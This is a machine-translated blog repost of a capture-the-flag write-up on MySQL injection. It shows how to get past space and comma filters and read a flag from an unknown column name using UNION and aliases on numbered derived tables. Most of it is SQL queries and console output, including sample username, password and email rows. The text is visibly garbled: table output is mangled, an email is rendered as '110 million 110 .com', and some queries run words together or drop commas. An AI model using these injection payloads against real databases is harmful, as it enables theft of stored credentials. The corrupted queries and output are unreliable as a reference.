Shulou(Shulou.com)06/01 Report--

Editor to share with you how Mysql bypasses unknown field names, I believe most people do not know much about it, so share this article for your reference, I hope you can learn a lot after reading this article, let's go to know it!

Preface

This article introduces the fifth question of DDCTF, the technique of bypassing unknown field names. Here we use this machine to operate, and the idea is very good and clear. Let's share it with you. Let's take a look at the detailed introduction:

Realization idea

Title filtering spaces and commas, spaces using% 0a join, or directly using parentheses can be bypassed.

The name of the field in which the flag is stored is unknown, and information_schema.columns also filters the hex of the table name, that is, the field name cannot be obtained. In this case, you can use federated query as follows:

The idea is to get the flag and make it appear under the known field name.

Sample code:

Mysql > select (select 1) a, (select 2) b, (select 3) c, (select 4) d | a | b | c | d | +-- + | 1 | 2 | 3 | 4 | +-+ 1 row in set (0.00 sec) mysql > select * from (select 1) a, (select 2) b, (select 3) c, (select 4) d +-- + | 1 | 2 | 3 | 4 | +-+ | 1 | 2 | 4 | + 3 | + 1 row in set (0.00 sec) mysql > select * from (select 1) a, (select 2) b, (select 3) c, (select 4) d union select * from user +-- + | 1 | 2 | 3 | 4 | +-+ | 1 | 2 | 3 | 4 | | 1 | admin | admin888 | 110@110.com | | 2 | test | test123 | 119@119.com | | 3 | cs | | cs123 | 120@120.com | +-- + 4 rows in set (0.01sec) mysql > select e.4 from (select * from (select 1) a | (select 2) b, (select 3) c, (select 4) d union select * from user) e +-+ | 4 | +-+ | 4 | 110@110.com | | 119@119.com | | 120@120.com | +-+ 4 rows in set (0.03 sec) mysql > select e.4 from (select * from (select 1) a, (select 2) b, (select 3) c, (select 4) d union select * from user) e limit 1 offset 3 +-+ | 4 | +-+ | 120@120.com | +-+ 1 row in set (0.01 sec) mysql > select * from user where id=1 union select (select e.4 from (select * from (select 1) a, (select 2) b, (select 3) c, (select 4) dunion select * from user) e limit 1 offset 3) f, (select 1) g, (select 1) h (select 1) I +-+ | id | username | password | email | +-+ | 1 | admin | admin888 | 110 million 110 .com | | 120@120.com | 1 | 1 | 1 | +-+ 2 rows in set (0.04 sec) are all the contents of Mysql's method for bypassing unknown field names Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.